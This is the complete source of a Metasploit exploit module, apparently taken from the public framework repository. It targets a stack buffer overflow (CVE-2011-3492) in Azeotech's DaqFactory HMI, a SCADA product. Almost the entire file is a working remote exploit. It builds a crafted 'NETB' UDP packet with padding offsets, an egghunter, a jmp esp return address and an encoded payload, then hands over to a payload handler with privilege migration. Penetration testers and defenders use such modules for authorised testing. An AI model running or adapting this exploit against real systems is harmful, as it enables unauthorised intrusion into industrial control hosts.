GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/daq_factory_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the DaqFactory 'NETB' request stack buffer overflow
  # tracked as CVE-2011-3492 (see 'References'). The module assembles a single
  # UDP datagram and uses the Egghunter mixin to reach the encoded payload.
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  # Registers the module metadata (name, description, authorship, references,
  # payload constraints, the single target) and the datastore options used
  # by #exploit.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DaqFactory HMI NETB Request Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Azeotech's DaqFactory
          product. The specific vulnerability is triggered when sending a specially crafted
          'NETB' request to port 20034. Exploitation of this vulnerability may take a few
          seconds due to the use of egghunter. This vulnerability was one of the 14
          releases discovered by researcher Luigi Auriemma.
        },
        'Author' => [
          'Luigi Auriemma', # Initial discovery, crash poc
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
        ],
        'References' => [
          [ 'CVE', '2011-3492'],
          [ 'OSVDB', '75496'],
          [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        # Payload constraints: at most 600 bytes and no NUL byte, since the
        # buffer below is built around a "\x00" separator.
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        # A single target; 'Ret' and 'Offset' are read back in #exploit via
        # target.ret and target['Offset'].
        'Targets' => [
          [
            'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
            {
              'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll
              'Offset' => 636,
            }
          ],
        ],
        'DisclosureDate' => '2011-09-13',
        'DefaultTarget' => 0,
        # NOTE(review): reliability/stability/side-effect notes are still
        # UNKNOWN_*; worth filling in once the module has been re-verified.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Required for EIP offset
        # The string length of 'DHCP' drives the padding arithmetic in
        # #exploit. It is registered as required with an empty default, so it
        # presumably has to be supplied explicitly — confirm against the
        # option validation.
        OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
        Opt::RPORT(20034)
      ]
    )
  end

  # Builds the malformed 'NETB' request and sends it as one UDP datagram,
  # then hands over to the payload handler.
  #
  # The amount of padding before the saved return address depends on the
  # length of the 'DHCP' option string, so the trailing padding is adjusted
  # around a 93-byte baseline before the egghunter, return address and egg
  # are appended.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # Options passed to generate_egghunter: no checksum, tag 'scar'.
    eggoptions = {
      :checksum => false,
      :eggtag => 'scar',
    }

    # Correct the offset according to the 2nd IP (DHCP) length
    # Assumes the DHCP string is shorter than 93 bytes; a longer value makes
    # offset negative — TODO confirm what rand_text_alpha_upper does then.
    iplen = datastore['DHCP'].length
    offset = 93 - iplen

    # The two branches are exhaustive for an Integer offset: they move the
    # trailing padding (finaloffset) in opposite directions around the
    # 80-byte pivot so the overall distance stays constant.
    if offset >= 80
      pktoffset = offset - 80
      finaloffset = target['Offset'] - pktoffset
    elsif offset <= 79
      pktoffset = 80 - offset
      finaloffset = target['Offset'] + pktoffset
    end

    # springboard onto our unmodified payload
    # generate_egghunter returns the hunter stub and the tagged egg as a pair.
    p = Rex::Arch::X86.jmp(750) + payload.encoded
    hunter, egg = generate_egghunter(p, payload_badchars, eggoptions)

    sploit = "NETB" # NETB request overflow
    sploit << rand_text_alpha_upper(233)
    sploit << "\x00" # part of the packet structure
    sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address
    sploit << make_nops(2)
    sploit << hunter
    # Assumes hunter is at most 50 bytes; a longer hunter makes this length
    # negative — TODO confirm against the Egghunter mixin.
    sploit << rand_text_alpha_upper(52 - hunter.length - 2)
    sploit << [target.ret].pack("V") # 'Ret' as a little-endian 32-bit value
    sploit << rand_text_alpha_upper(12)
    sploit << Rex::Arch::X86.jmp_short(-70)
    sploit << egg
    # packetlen needs to be adjusted to a max of 0x400 as per advisory
    sploit << rand_text_alpha_upper(finaloffset - egg.length)

    # The use of rand_text_alpha_upper() ensures we always get the same length for the
    # first IP address.
    # In-place overwrite of bytes 12..15 of the already-built buffer.
    sploit[12, 4] = rand_text_alpha_upper(4)

    # Single datagram; no response is read before handing off to the handler.
    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end